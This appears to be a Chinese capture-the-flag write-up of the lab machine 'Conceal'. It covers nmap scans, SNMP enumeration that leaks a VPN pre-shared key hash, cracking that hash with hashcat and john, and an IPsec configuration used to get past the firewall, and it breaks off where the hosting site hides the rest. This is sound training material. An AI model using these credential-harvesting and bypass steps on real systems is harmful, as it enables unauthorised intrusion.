代码拉取完成,页面将自动刷新
扫描端口
nmap -sV -A -Pn 10.10.10.116
一个开放端口也没有,还以为靶机出问题了,重置了一次
重新进行udp端口扫描
sudo nmap -sU -sV -A 10.10.10.116
发现161,500
161 snmp
500/udp open isakmp?
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server (public)
| snmp-netstat:
| TCP 0.0.0.0:21 0.0.0.0:0
| TCP 0.0.0.0:80 0.0.0.0:0
| TCP 0.0.0.0:135 0.0.0.0:0
| TCP 0.0.0.0:445 0.0.0.0:0
| TCP 0.0.0.0:49664 0.0.0.0:0
| TCP 0.0.0.0:49665 0.0.0.0:0
| TCP 0.0.0.0:49666 0.0.0.0:0
| TCP 0.0.0.0:49667 0.0.0.0:0
| TCP 0.0.0.0:49668 0.0.0.0:0
|_ UDP 0.0.0.0:123 *:*
| snmp-processes:
|_ 1:
| snmp-sysdescr: Hardware: AMD64 Family 23 Model 1 Stepping 2 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)
|_ System uptime: 15m35.92s (93592 timeticks)
| snmp-win32-services:
| Power
|_ Server
|_snmp-win32-software:
| snmp-win32-users:
|_ Guest
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
Service Info: Host: Conceal
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 314.86 ms 10.10.14.1
2 417.80 ms 10.10.10.116
根据nmap扫描结果,使用snmpwalk扫描
snmpwalk -c public -v 1 10.10.10.116
STRING: "IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43" iso.3.6.1.2.1.1.5.0 = STRING: "Conceal"
somd5解密为Dudecake1!
本地解密的话先hashid -m,给出可能类型。然后全部跑一遍,ntlm能解出来
hashcat -a 0 -m 1000 9C8B1A372B1878851BE2C097031B6E43 --wordlist /usr/share/wordlists/rockyou.txt
或者john破解
john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt ntlm-hash.txt
john --show --format=nt ntlm-hash.txt
使用ike-scan扫描vpn信息
vim /etc/ipsec.conf
conn to-conceal
authby=secret
auto=route
keyexchange=ikev1
ike=3des-sha1-modp1024
left=10.10.14.4
right=10.10.10.116
type=transport
esp=3des-sha1
rightprotoport=tcp
配置/etc/ipsec.secrets
10.10.14.4 10.10.10.116 : PSK "Dudecake1!"
#解决不支持3des_cbc算法问题
sudo apt-get install libstrongswan-extra-plugins
sudo apt-get install libstrongswan-standard-plugins
sudo ipsec start
sudo ipsec up to-conceal
建立连接绕过防火墙后,终于可以正常扫端口了
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。